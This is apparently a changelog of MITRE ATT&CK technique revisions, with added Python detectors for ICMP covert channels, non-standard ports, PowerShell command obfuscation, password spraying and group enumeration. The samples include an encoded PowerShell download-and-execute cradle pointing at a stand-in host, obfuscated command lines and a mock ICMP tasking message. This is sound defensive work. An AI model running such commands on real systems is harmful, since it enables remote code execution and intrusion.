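The T1095 description's point is that ICMP is universally implemented but rarely inspected, so an echo payload can carry tasking. The following Python is an added example for this entry, not ATT&CK's code nor code from the cited sources. It parses raw ICMP messages, verifies the RFC 1071 checksum, and flags echo payloads that do not look like a stock ping: the reference patterns (iputils ping on 64-bit Linux writes a 16-byte timestamp followed by bytes whose value equals their offset; Windows ping sends the fixed 32-byte alphabet string) are assumptions drawn from common captures, and both sample messages are constructed inside the block.

```python
import math
import struct
from collections import Counter

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload: bytes, ident: int = 0x1234, seq: int = 1,
               icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """Assemble an ICMP echo message with a correct checksum (used to build samples)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(msg: bytes):
    """Split an ICMP message into (type, code, id, seq, payload), verifying the checksum."""
    if len(msg) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    if icmp_checksum(msg[:2] + b"\x00\x00" + msg[4:]) != csum:
        raise ValueError("bad ICMP checksum")
    return icmp_type, code, ident, seq, msg[8:]


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Stock ping payloads (assumed from common captures): Windows ping sends this
# 32-byte string; iputils ping on 64-bit Linux sends a 16-byte timestamp and
# then bytes equal to their own offset (0x10 .. 0x37) for the default 56 bytes.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_stock_ping(payload: bytes) -> bool:
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    return len(payload) == 56 and all(payload[i] == i for i in range(16, 56))


def classify_echo(msg: bytes, max_payload: int = 64, entropy_threshold: float = 5.0):
    """Return the reasons an echo message looks like an ICMP covert channel ([] if none)."""
    icmp_type, _code, _ident, _seq, payload = parse_icmp(msg)
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return []
    if looks_like_stock_ping(payload):
        return []
    reasons = ["payload does not match a stock ping pattern"]
    if len(payload) > max_payload:
        reasons.append(f"oversized payload ({len(payload)} bytes)")
    entropy = shannon_entropy(payload)
    if entropy > entropy_threshold:
        reasons.append(f"high-entropy payload ({entropy:.2f} bits/byte)")
    return reasons


# Constructed samples: a Linux-style ping, and a tasking message carrying a ciphertext-like blob.
LINUX_PING = build_echo(bytes(16) + bytes(range(16, 56)))
C2_ECHO = build_echo(b"TASK:whoami\x00" + bytes(range(256)), ident=0xBEEF, seq=7)

if __name__ == "__main__":
    for name, sample in (("linux-ping", LINUX_PING), ("c2-echo", C2_ECHO)):
        print(name, classify_echo(sample) or "looks benign")
```

A real implant will not be this obliging; the checks worth adding on top are per-host echo volume, a fixed ICMP identifier reused across many sequence numbers, and request/reply payloads that differ in length, since a stock ping reply echoes the request payload unchanged.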

[T1571] Non-Standard Port

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

New Description
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | (none) | 3.1.0
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-26 22:02:25.221000+00:00 | 2023-02-28 22:28:35.202000+00:00
description | Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. | Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)
external_references[1]['source_name'] | Symantec Elfin Mar 2019 | University of Birmingham C2
external_references[1]['description'] | Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url'] | https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name'] | Fortinet Agent Tesla April 2018 | Symantec Elfin Mar 2019
external_references[2]['description'] | Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018. | Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
external_references[2]['url'] | https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html | https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
external_references[3]['source_name'] | University of Birmingham C2 | change_rdp_port_conti
external_references[3]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.
external_references[3]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | https://twitter.com/TheDFIRReport/status/1498657772254240768
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New Value
external_references | (none) | {'source_name': 'Fortinet Agent Tesla April 2018', 'description': 'Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.', 'url': 'https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html'}
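
The new T1571 text covers two sides of the same behaviour: protocol/port mismatches on the wire (HTTPS on 8088 or 587) and host-side reconfiguration such as the Registry change that moves RDP off 3389. The following Python is an added example for this entry, not ATT&CK's code nor anything from the cited reports. It scores a constructed Zeek-style conn.log excerpt using Zeek's content-based service label against a table of expected ports, and reads the RDP listener port from a constructed `reg export` of the RDP-Tcp key. All hosts, flows and the EXPECTED_PORTS table are invented for the example and would be tuned per environment; the Registry path and PortNumber value name are the real ones.

```python
import re

# Constructed Zeek-style conn.log excerpt (tab-separated), invented for this example.
CONN_LOG = """#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice
1680000001.0\t10.1.2.3\t51022\t203.0.113.10\t443\ttcp\tssl
1680000002.0\t10.1.2.3\t51023\t203.0.113.11\t8088\ttcp\tssl
1680000003.0\t10.1.2.4\t51100\t203.0.113.12\t587\ttcp\tssl
1680000004.0\t10.1.2.4\t51101\t198.51.100.20\t22\ttcp\tssh
1680000005.0\t10.1.2.5\t51200\t198.51.100.21\t3389\ttcp\trdp
1680000006.0\t10.1.2.5\t51201\t198.51.100.22\t8443\ttcp\trdp
1680000007.0\t10.1.2.6\t51300\t198.51.100.23\t80\ttcp\thttp
1680000008.0\t10.1.2.6\t51301\t198.51.100.24\t4444\ttcp\t-
"""

# Ports on which each application protocol is expected in this (invented) environment.
EXPECTED_PORTS = {
    "ssl": {443, 8443},
    "http": {80, 8080},
    "ssh": {22},
    "rdp": {3389},
    "smtp": {25, 465, 587},
    "dns": {53},
}


def parse_conn_log(text):
    """Parse Zeek's tab-separated log format using its #fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def find_port_mismatches(rows):
    """Return (orig_h, resp_h, resp_p, service) for flows whose detected protocol
    does not belong on the destination port. Zeek labels the flow from its content,
    so the label stays trustworthy when the port is chosen to mislead."""
    hits = []
    for r in rows:
        port = int(r["id.resp_p"])
        for svc in r["service"].split(","):
            expected = EXPECTED_PORTS.get(svc)
            if expected and port not in expected:
                hits.append((r["id.orig_h"], r["id.resp_h"], port, svc))
    return hits


# Host-side variant: the Registry value that moves the RDP listener off 3389.
RDP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

# Constructed `reg export` output with PortNumber set to 3390 (0xd3e); the default is 3389 (0xd3d).
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3e
"""


def rdp_port_from_reg_export(text, default=3389):
    """Return the configured RDP listener port from a .reg export (default if the key is absent)."""
    in_key = False
    for line in text.splitlines():
        if line.startswith("["):
            in_key = line.strip("[]").lower() == RDP_KEY.lower()
        elif in_key:
            m = re.match(r'"PortNumber"=dword:([0-9a-fA-F]{8})', line)
            if m:
                return int(m.group(1), 16)
    return default


if __name__ == "__main__":
    for hit in find_port_mismatches(parse_conn_log(CONN_LOG)):
        print("port mismatch:", hit)
    port = rdp_port_from_reg_export(REG_EXPORT)
    print("RDP listener port:", port, "(non-standard)" if port != 3389 else "(default)")
```

The flow to 4444 with no service label is deliberately not flagged here: Zeek could not identify the protocol, which is a different signal (unrecognised traffic to a high port) and is better handled by a separate rule than by guessing. On a live Windows host the same value can be pulled with `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber`, and Sysmon Registry events on that key catch the change as it happens.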

[T1027] Obfuscated Files or Information

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

New Description
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

New Mitigations:

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-30 18:06:32.808000+00:00 | 2023-03-30 21:01:43.857000+00:00
description | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html | https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Process: OS API Execution | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[1] | Command: Command Execution | Module: Module Load
x_mitre_data_sources[2] | File: File Creation | Script: Script Execution
x_mitre_data_sources[3] | Module: Module Load | Command: Command Execution
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | (none) | Process: OS API Execution
x_mitre_data_sources | (none) | WMI: WMI Creation
x_mitre_data_sources | (none) | File: File Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/267.html', 'external_id': 'CAPEC-267'} | (none)
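
The part of T1027 that changed in this release is the command-obfuscation sentence: characters, aliases and platform-specific semantics used to defeat signature matching. The following Python is an added example for this entry, not ATT&CK's code nor code from the cited FireEye or Palo Alto posts. It takes a process command line, decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE, which is what powershell.exe expects), and then scans both the raw line and the decoded text for lexical obfuscation tells. The four sample command lines are constructed here; `example.invalid` is a reserved name.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these spellings
# are the ones commonly seen. Case-insensitive; the argument is Base64.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# Lexical obfuscation tells for PowerShell and cmd.exe command lines.
INDICATORS = {
    "backtick-split-token": re.compile(r"\w`\w"),
    "string-concat-fragments": re.compile(r"'[^']{1,5}'\s*\+\s*'"),
    "char-code-construction": re.compile(r"(?i)\[char\]\s*\d+"),
    "format-operator": re.compile(r"(?i)\)\s*-f\s*['\"]"),
    "caret-escapes": re.compile(r"(?:\^.){3,}"),
    "download-cradle": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"),
}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmdline: str):
    """Decode and score a command line; returns {'decoded': str|None, 'indicators': [names]}."""
    decoded = decode_encoded_command(cmdline)
    indicators = ["encoded-command"] if decoded is not None else []
    # Scan the raw line and, when present, the decoded script: the cradle is usually inside.
    text_to_scan = cmdline + ("\n" + decoded if decoded else "")
    for name, pattern in INDICATORS.items():
        if pattern.search(text_to_scan):
            indicators.append(name)
    return {"decoded": decoded, "indicators": indicators}


def to_encoded_command(script: str) -> str:
    """Encode a script the way it is passed to -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed samples, invented for this example.
SAMPLES = {
    "encoded": "powershell.exe -NoP -W Hidden -enc " + to_encoded_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "backtick-concat": "powershell -c \"I`EX ('Ne'+'w-Ob'+'ject')\"",
    "caret": "cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -w hidden",
    "benign": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        result = analyze_command(cmd)
        print(f"{label:16} indicators={result['indicators']} decoded={result['decoded']!r}")
```

The decode step matters more than the regexes: the script body is what carries the download cradle, and an encoded command line is near-opaque to a string-matching rule. Two of the tells (backtick splitting, quote-and-concatenate fragments) survive the decode because they live inside the script, so scanning the decoded text catches layered obfuscation. Script Block Logging (Event ID 4104) gives the same plaintext without decoding, where it is enabled.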

[T1110.001] Brute Force: Password Guessing

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-22 18:37:22.173000+00:00 | 2023-04-14 23:04:08.394000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | User Account: User Account Authentication | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | User Account: User Account Authentication
x_mitre_version | 1.3 | 1.4
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'} | (none)

[T1110.003] Brute Force: Password Spraying

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | (none) | 3.1.0
x_mitre_deprecated | (none) | False
external_references | (none) | Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] | (none)
external_references | CAPEC-565 | (none)
values_changed
STIX Field | Old value | New Value
modified | 2021-04-06 12:32:47.678000+00:00 | 2023-04-14 23:04:38.816000+00:00
external_references[1]['source_name'] | capec | Trimarc Detecting Password Spraying
external_references[1]['url'] | https://capec.mitre.org/data/definitions/565.html | https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
x_mitre_version | 1.2 | 1.3
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Trimarc Detecting Password Spraying', 'description': 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.', 'url': 'https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing'} | (none)
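
Both Brute Force entries above (T1110.001 Password Guessing and T1110.003 Password Spraying) now list Application Log and User Account Authentication as data sources, and the spraying entry keeps the Trimarc write-up on detecting sprays from Windows security event auditing as its reference. The following Python is an added example for these two entries, not ATT&CK's code nor Trimarc's. It slides a time window over failed-logon events per source address and separates the two shapes: spraying is many distinct accounts with one or two failures each, guessing is one account with many. The events are constructed and assume the relevant Windows event IDs (4625, and 4771/4776 from domain controllers) have already been normalised to a common `src_ip`/`user` shape by the log pipeline; thresholds are illustrative.

```python
from collections import Counter, defaultdict

# Constructed Windows Security events (a subset of 4625 fields), invented for this example.
BASE_TS = 1680000000
EVENTS = []
# One source tries a dozen accounts once each: the spraying shape.
for i in range(12):
    EVENTS.append({"ts": BASE_TS + i, "event_id": 4625, "src_ip": "10.9.9.9",
                   "user": f"user{i:02d}", "status": "0xC000006D"})
# One source hammers a single service account: the guessing shape.
for i in range(15):
    EVENTS.append({"ts": BASE_TS + 100 + i, "event_id": 4625, "src_ip": "10.8.8.8",
                   "user": "svc_backup", "status": "0xC000006D"})
# Benign noise: a user mistyping a password twice (with inconsistent case).
EVENTS += [
    {"ts": BASE_TS + 300, "event_id": 4625, "src_ip": "10.7.7.7", "user": "Alice", "status": "0xC000006D"},
    {"ts": BASE_TS + 305, "event_id": 4625, "src_ip": "10.7.7.7", "user": "alice", "status": "0xC000006D"},
]

# Logon failure, Kerberos pre-authentication failure, NTLM credential validation.
FAILURE_EVENTS = {4625, 4771, 4776}


def detect_brute_force(events, window=600, spray_min_users=8, spray_max_per_user=2,
                       guess_min_attempts=10):
    """Classify failed-logon bursts per source as 'spray' and/or 'guess'.

    For each source, a window of `window` seconds slides over its failures in
    time order. Spraying: at least spray_min_users distinct accounts, none tried
    more than spray_max_per_user times. Guessing: any one account tried at least
    guess_min_attempts times. Returns {src_ip: sorted list of kinds}.
    """
    relevant = sorted((e for e in events if e["event_id"] in FAILURE_EVENTS),
                      key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in relevant:
        by_src[e["src_ip"]].append(e)

    findings = {}
    for src, evs in by_src.items():
        kinds = set()
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            per_user = Counter(e["user"].lower() for e in evs[start:end + 1])
            busiest = max(per_user.values())
            if len(per_user) >= spray_min_users and busiest <= spray_max_per_user:
                kinds.add("spray")
            if busiest >= guess_min_attempts:
                kinds.add("guess")
        if kinds:
            findings[src] = sorted(kinds)
    return findings


if __name__ == "__main__":
    for src, kinds in detect_brute_force(EVENTS).items():
        print(f"{src}: {', '.join(kinds)}")
```

The per-user ceiling in the spray branch is what keeps the two classes apart: a spray deliberately stays under the lockout threshold per account, so a rule that only counts total failures per source will either miss it or drown in helpdesk noise. Keying on source is the weak point against distributed sprays from many addresses; the complementary rule groups by target tenant or domain over a longer window and counts distinct failing accounts.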

[T1069] Permission Groups Discovery

Current version: 2.5

Version changed from: 2.4 → 2.5


Old Description
Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

New Description
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | (none) | 3.1.0
x_mitre_deprecated | (none) | False
external_references | (none) | Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] | (none)
external_references | CAPEC-576 | (none)
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 18:10:53.423000+00:00 | 2023-04-15 17:26:53.365000+00:00
description | Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. | Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)
external_references[1]['source_name'] | capec | K8s Authorization Overview
external_references[1]['url'] | https://capec.mitre.org/data/definitions/576.html | https://kubernetes.io/docs/reference/access-authn-authz/authorization/
external_references[2]['source_name'] | K8s Authorization Overview | CrowdStrike BloodHound April 2018
external_references[2]['description'] | Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021. | Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.
external_references[2]['url'] | https://kubernetes.io/docs/reference/access-authn-authz/authorization/ | https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
x_mitre_data_sources[0] | Group: Group Enumeration | Command: Command Execution
x_mitre_data_sources[1] | Application Log: Application Log Content | Group: Group Enumeration
x_mitre_data_sources[3] | Group: Group Metadata | Application Log: Application Log Content
x_mitre_data_sources[4] | Command: Command Execution | Group: Group Metadata
x_mitre_version | 2.4 | 2.5
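
The T1069 entry now lists Command Execution first among its data sources and cites BloodHound-style enumeration of hidden administrative accounts, with Kubernetes authorization added as a platform reference. The following Python is an added example for this entry, not ATT&CK's code nor CrowdStrike's. It classifies process command lines from Windows, Linux and kubectl, pulls out the group being queried where the syntax exposes one, and marks queries against privileged groups so that a single `net group "Domain Admins" /domain` ranks above routine `whoami` noise. The command lines and the PRIVILEGED_GROUPS list are constructed for the example.

```python
import re

# Group names whose enumeration deserves an alert wherever it happens (illustrative list).
PRIVILEGED_GROUPS = {
    "domain admins", "enterprise admins", "schema admins", "administrators",
    "account operators", "backup operators", "sudo", "wheel", "system:masters",
}

# (label, regex). A capture group, when the syntax has one, is the group being queried.
PATTERNS = [
    ("net-group", re.compile(
        r'(?i)\bnet1?(?:\.exe)?\s+(?:local)?group(?:\s+"([^"]+)"|\s+([^\s/"]+))?(?:\s+/do(?:main)?)?')),
    ("ad-cmdlet", re.compile(
        r'(?i)\bGet-ADGroupMember\b(?:\s+-Identity)?\s+(?:"([^"]+)"|\'([^\']+)\'|(\S+))')),
    ("whoami-groups", re.compile(r'(?i)\bwhoami(?:\.exe)?\s+/(?:groups|all)\b')),
    ("dsquery-group", re.compile(r'(?i)\bdsquery(?:\.exe)?\s+group\b')),
    ("linux-groups", re.compile(r'(?i)\bgetent\s+group(?:\s+(\S+))?|^(?:id|groups)\b')),
    ("k8s-rbac", re.compile(r'(?i)\bkubectl\s+(?:auth\s+can-i|get\s+(?:cluster)?rolebindings?\b)')),
    ("bloodhound", re.compile(r'(?i)sharphound|invoke-bloodhound|bloodhound-python')),
]


def classify_command(cmdline: str):
    """Return (label, group_or_None, privileged) if the command enumerates groups, else None."""
    for label, pattern in PATTERNS:
        m = pattern.search(cmdline)
        if not m:
            continue
        group = next((g for g in m.groups() if g), None)
        group = group.strip() if group else None
        privileged = group is not None and group.lower() in PRIVILEGED_GROUPS
        return label, group, privileged
    return None


def scan_commands(cmdlines):
    """Apply classify_command to a batch; returns (cmdline, label, group, privileged) tuples."""
    hits = []
    for cmd in cmdlines:
        result = classify_command(cmd)
        if result:
            hits.append((cmd,) + result)
    return hits


# Constructed process command lines, invented for this example.
COMMANDS = [
    'net group "Domain Admins" /domain',
    'net localgroup administrators',
    'net group /domain',
    'whoami /groups',
    'Get-ADGroupMember -Identity "Enterprise Admins" -Recursive',
    'getent group sudo',
    'kubectl auth can-i --list',
    'SharpHound.exe -c All',
    'notepad.exe C:\\Users\\alice\\readme.txt',
]

if __name__ == "__main__":
    for cmd, label, group, privileged in scan_commands(COMMANDS):
        marker = "PRIVILEGED" if privileged else "info"
        print(f"[{marker:10}] {label:14} group={group!r}  {cmd}")
```

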